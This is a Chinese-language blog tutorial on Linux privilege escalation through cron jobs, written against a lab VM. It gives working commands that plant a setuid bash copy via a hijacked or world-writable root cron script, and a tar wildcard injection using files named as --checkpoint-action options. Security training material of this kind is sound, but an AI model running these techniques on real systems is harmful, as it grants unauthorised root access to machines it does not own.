linux计划任务提权 - whale3070's blog

1
2
3

靶机地址
ssh user@192.168.28.131
password123

计划任务中的相对路径&绝对路径

制作的视频教程：https://www.bilibili.com/video/BV1wA411Y79Q/

#查看计划任务
cat /etc/crontab
cat 
#查找sh脚本
find / -name "overwrite.sh" 2>/dev/null

#查看权限
ls -al /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13  2017 /usr/local/bin/overwrite.sh
Linux 权限模型通过允许给每个文件系统对象设置三种独立的权限级别来工作 — 它们为文件的所有者、文件的组以及所有其他用户。

cat /usr/local/bin/overwrite.sh

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh

chmod +x /home/user/overwrite.sh
/tmp/bash -p

通配符与进度条提权

cat /usr/local/bin/compress.sh
 
对tar cxf的解释：https://whale3070.github.io/linux/2017/01/01/%E5%8E%8B%E7%BC%A9%E4%B8%8E%E8%A7%A3%E5%8E%8B%E7%BC%A9/

tar命令与checkpoint：https://www.gnu.org/software/tar/manual/html_section/tar_26.html

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
touch /home/user/--checkpoint-action=exec="sh runme.sh"

---
**　(1)   -b, --blocking-factor BLOCKS **

**                  BLOCKS x 512 bytes per record**

                ** 这个用于计算一个记录块是大小．是５１２的倍数**

**　　（２）--checkpoint
           display progress messages every NUMBERth record (default 10)**

　　　　**这个用进度条显示信息，检测数据点的位置，是record为单位**

　**　（３）--checkpoint-action=ACTION
           execute ACTION on each checkpoint**

**　　　这个是每个checkpoint，可以自定义输出你想的信息**

计划任务——sh文件覆盖

cat /etc/crontab
ls -l /usr/local/bin/overwrite.sh

#root权限运行
chmod o=rw /usr/local/bin/overwrite.sh
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh

参考资料

https://github.com/sagishahar-zz/lpeworkshop
利用通配符进行Linux本地提权

linux

linux内核升级&降级 Previous

linux反弹shell Next